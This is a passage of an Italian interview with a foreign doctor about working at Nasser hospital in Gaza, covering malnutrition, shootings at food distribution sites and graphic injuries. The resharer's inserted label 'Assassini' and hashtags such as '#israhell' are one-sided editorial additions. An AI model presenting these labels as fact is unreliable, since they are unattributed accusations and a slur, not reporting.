tragica riguarda i bambini, che arrivano con livelli alti di malnutrizione secondo i parametri dell’Oms. E siccome manca tutto, potevamo alimentare solo i pazienti tra i sei mesi e i cinque anni d’età.»

Che cosa succede se arriva un bambino di sei o sette anni?

«Siamo a dire che per le linee guida possiamo usare la formula per nutrire solo i pazienti tra i sei mesi e i cinque anni. E che gli altri bambini dovevano tornare a casa. E mentre li guardi e glielo dici, sai che potrebbero morire. Il pediatra dell’ospedale Nasser, quando ne abbiamo parlato, era distrutto. Ha perso sua moglie e tre dei suoi figli. E non poteva aiutare i suoi pazienti. Un trauma costante, quotidiano. Parliamo dei numeri e dei dati che arrivano da Gaza. Per alcuni non credibili, perché forniti dal Ministero della Salute di Gaza.»

Ha percepito la presenza di Hamas nella struttura ospedaliera?

«Nel mio lavoro quotidiano al Nasser, in un mese intero, non ho mai visto né una persona in tenuta da combattimento, né un’arma, né nessuno riconducibile ad Hamas. I pazienti sono solo pazienti. Nessuno è arrivato armato, nessuno da cui potessi pensare che facesse parte di un gruppo armato.»

Come sono cambiate le cose al Nasser dopo l’istituzione della Ghf? (Gaza Humanitarian Foundation è un'organizzazione americana, con sede nel Delaware. Assassini)

«È stato un completo disastro. Nel primo caso sono arrivate in ospedale 200 persone ferite e 30 cadaveri, compresi bambini. Una scena orribile. Persone affamate, in fila per ore per ricevere gli aiuti, uccise mentre aspettavano un po’ di cibo. Abbiamo operato, estratto i proiettili. Il giorno dopo ho rivisto i pazienti. Ho fatto loro delle domande, proprio come fai tu ora a me: “Dove eri? Cosa stavi facendo?” E i pazienti dicevano: “Eravamo al punto di distribuzione alimentare.” “Chi ha sparato?” “Gli israeliani, l’Idf.” “Sei sicuro?” “Sì, sono scesi dai carri armati e poi hanno aperto il fuoco sulla gente che aspettava da mangiare.” “E tu che cosa hai fatto dopo?” “Ci siamo stesi a terra per un’ora e mezza. Uno dei miei amici è morto davanti a me. Poi piano piano siamo riusciti ad andarcene.” I pazienti che arrivavano dal centro di distribuzione avevano tutti i tipi di ferite: colpi alla testa, al torace, all’addome. E poi, altri eventi con vittime di massa, o quotidiani, a causa delle bombe. E quelle uccidono tutti. Bambini che stavano solo cercando di giocare o qualcosa: vengono uccisi comunque.»

Operando, ha avuto l’impressione che fossero stati presi di mira intenzionalmente?

«Alcuni giorni al pronto soccorso vedevamo solo colpi alla testa. Noi medici stranieri ci chiedevamo: “Oggi è il giorno dei colpi alla testa? Com’è possibile?” Il giorno dopo solo torace. Altri giorni certe parti del corpo: gambe, braccia. Poi cominci a capire: i quadricotteri, i droni, sono programmati per colpire zone specifiche del corpo. Abbiamo operato persone colpite quando erano già a terra. Vedi, il proiettile passa dalla spalla alla testa solo se sei sdraiato. Quel tipo di traiettoria può venire solo dall’alto. E poi casi orribili: una donna incinta di 24 settimane colpita da un proiettile che ha attraversato l’intestino e poi l’utero. Il feto è morto. È stato terrificante: vedere il feto, con mani e piedi che sporgevano fuori dall’utero, e questa giovane donna che ha dovuto subire un’isterectomia. Ora non potrà più avere figli. Ha uno stoma, il colon esterno. È solo orribile: psicologicamente, fisicamente, tutto.»

Come ha fatto a convivere con questo livello di dolore?

«Vedi gli effetti di quello che è, e vedi gli effetti di quello che sarà. Sai che se non entra il cibo, se non puoi nutrirti, un’infezione da cui potresti riprenderti con un po’ di antibiotico può diventare una polmonite, e poi muori per quello. Succede ogni giorno. Sono le morti indirette di questa guerra. Così tante persone sono già morte. Ma quando parti da una condizione di estrema debolezza, basta poco a condannarti, perché il tuo corpo non ce la fa. Anche se la guerra finisse oggi, la devastazione fisica e psicologica durerà tutta la vita. Ti faccio un esempio. Un ragazzo di 15 anni, in terapia intensiva ma cosciente. Le schegge gli hanno attraversato la spina dorsale. Ora è paraplegico. Non sente nulla sotto l’ombelico. Non può usare le gambe. Tutta la sua famiglia è stata uccisa. Un giorno mi ha guardato e mi ha detto: “Dottore, posso morire, per favore?” L’ingiustizia è questo: un ragazzo di 15 anni che dovrà usare la sedia a rotelle per tutta la vita, tra le macerie di Gaza, solo al mondo. Cos’è l’ingiustizia, per lui, per arrivare a dire: “Lasciatemi morire, perché so che soffrirò per tutta la vita”?»


#Gaza #genocidio #goherrabhour #testimonianza #Palestina #israhell #alfredofacchini

reshared this